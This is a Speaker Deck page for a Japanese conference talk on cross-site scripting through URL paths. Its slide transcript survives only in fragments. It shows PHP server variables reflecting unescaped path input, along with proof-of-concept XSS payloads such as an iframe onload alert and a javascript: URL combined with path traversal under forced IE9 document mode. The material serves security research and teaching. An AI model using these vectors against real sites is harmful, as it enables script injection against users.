Save 37% off PRO during our
Black Friday Sale! »
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Masato Kinugawa
March 29, 2016
Technology
14
22k
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Shibuya.XSS techtalk #7 の資料です。
Masato Kinugawa
March 29, 2016
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
masatokinugawa
21
5.2k
masatokinugawa
5
75k
masatokinugawa
9
14k
masatokinugawa
18
10k
masatokinugawa
35
18k
masatokinugawa
2
1.5k
masatokinugawa
20
22k
masatokinugawa
4
2.3k
masatokinugawa
7
2.3k
Other Decks in Technology
See All in Technology
nadare881
0
920
airreader
0
340
yamanoku
3
2.6k
y503unavailable
0
180
takipone
0
160
masuda220
PRO
1
140
silmin_
0
180
qsona
16
5.9k
rakus_dev
0
480
comucal
PRO
0
490
sansandsoc
5
1.6k
sagara
0
210
Featured
See All Featured
caitiem20
314
18k
chriscoyier
688
180k
dougneiner
123
8.3k
paigeccino
7
430
3n
169
23k
smashingmag
237
18k
mza
82
4.5k
lara
27
3.5k
geoffreycrofte
44
3.7k
orderedlist
PRO
332
36k
brad_frost
163
6.9k
pedronauck
655
120k
Transcript
None
None
None
None
None
https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...
... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1
... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1
None
http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz
http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc
None
SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>
GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php
/test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E
http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
/test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1
/test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>
None
None
None
None
None
None
None
None
None
None
None
None
None
None
None
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta
http-equiv="X-UA-Compatible" content="IE=9"> </head>
<svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>
ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError
<meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe
src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf
<meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>
<script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>
None
None
None
None
None
None
None
None
None
None
None
None
None
masatokinugawa
nadare881
airreader
yamanoku
y503unavailable
takipone
masuda220
silmin_
qsona
rakus_dev
comucal
sansandsoc
sagara
caitiem20
chriscoyier
dougneiner
paigeccino
3n
smashingmag
mza
lara
geoffreycrofte
orderedlist
brad_frost
pedronauck
